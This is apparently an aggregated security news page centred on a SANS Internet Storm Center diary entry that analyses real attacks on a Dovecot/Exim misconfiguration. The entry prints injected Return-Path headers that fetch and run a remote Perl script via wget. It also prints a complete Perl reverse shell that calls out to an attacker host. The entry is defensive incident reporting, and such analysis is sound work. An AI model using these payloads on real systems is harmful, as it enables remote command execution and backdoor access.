Hackin9

Howard Schmidt to Keynote at CodenomiCON Las Vegas
HispanicBusiness.com
Michelle Cantone , Wesley Marsh Jr ., and Dan Byrnside (winning team from James Madison University's Infosec MBA Program Case Study Competition ) present the case study Amazon Kindle: The Cost of Vulnerability Persistence. Mikko Varpiola ...

 
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

Sometimes it doesn't take an IDS to detect an attack, but just reading your e-mail will do. Our read Timo sent along these two e-mails he received, showing exploitation of a recent Dovecot/Exim configuration flaw [1]:

Return-Path: <x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}x.cc.st/exim``perl${IFS}/tmp/p.pl`@blaat.com>
X-Original-To: [email protected]
Delivered-To: [email protected]
Received: from domain.local (disco.dnttm.ro [193.226.98.239])
       by [REMOVED]


Return-Path: <x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}x.cc.st/php.jpg``perl${IFS}/tmp/p.pl`@blaat.com>
X-Original-To: [email protected]
Delivered-To: [email protected]
Received: from domain.local (disco.dnttm.ro [193.226.98.239])
       by [REMOVED]

The actual exploit happens in the "Return-Path" line. If exim is used as a mail server, it can be configured to "pipe" messages to an external program in order to allow for more advanced delivery and filtering options. A common configuration includes the mail devliery agent Dovecot which implements a pop3 and imap server. Sadly, the sample configuration provided to configure Dovecot with Exim passes the string the attacker provided as "MAIL FROM" in the e-mail envelope as a shell parameter without additional validation.

The first script ("exim") is a little one liner shell connecting to port 9 on vps.usits.net (reformated for redability)

use Socket;
$i="vps.usits.net";
$p=9;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))) {
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");};

The second script  first retrieves a perl script, and then executes it. The perl script does implement a simple IRC client connecting to mix.cf.gs on port 3303 (right now, this resolves to 140.117.32.135, but is not responding on port 3303)

For more details, see the writeout by RedTeam Pentesting [2]

[1] http://osvdb.org/show/osvdb/93004
[2] https://www.redteam-pentesting.de/en/advisories/rt-sa-2013-001/-exim-with-dovecot-typical-misconfiguration-leads-to-remote-command-execution

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
3D Robotics gave a sneak preview of a comparatively cheap consumer drone at an unmanned aircraft convention in San Francisco this week.
 
 
 

Research: 2013 Strategic Security Survey
InformationWeek
In our 2012 Strategic Security Survey report, we said that most infosec pros are too willing to pin the blame for problems on end users, the CFO, vendors, developers -- anywhere but ourselves. Harsh? Maybe, but the message seems to have gotten through: ...

 
Internet Storm Center Infocon Status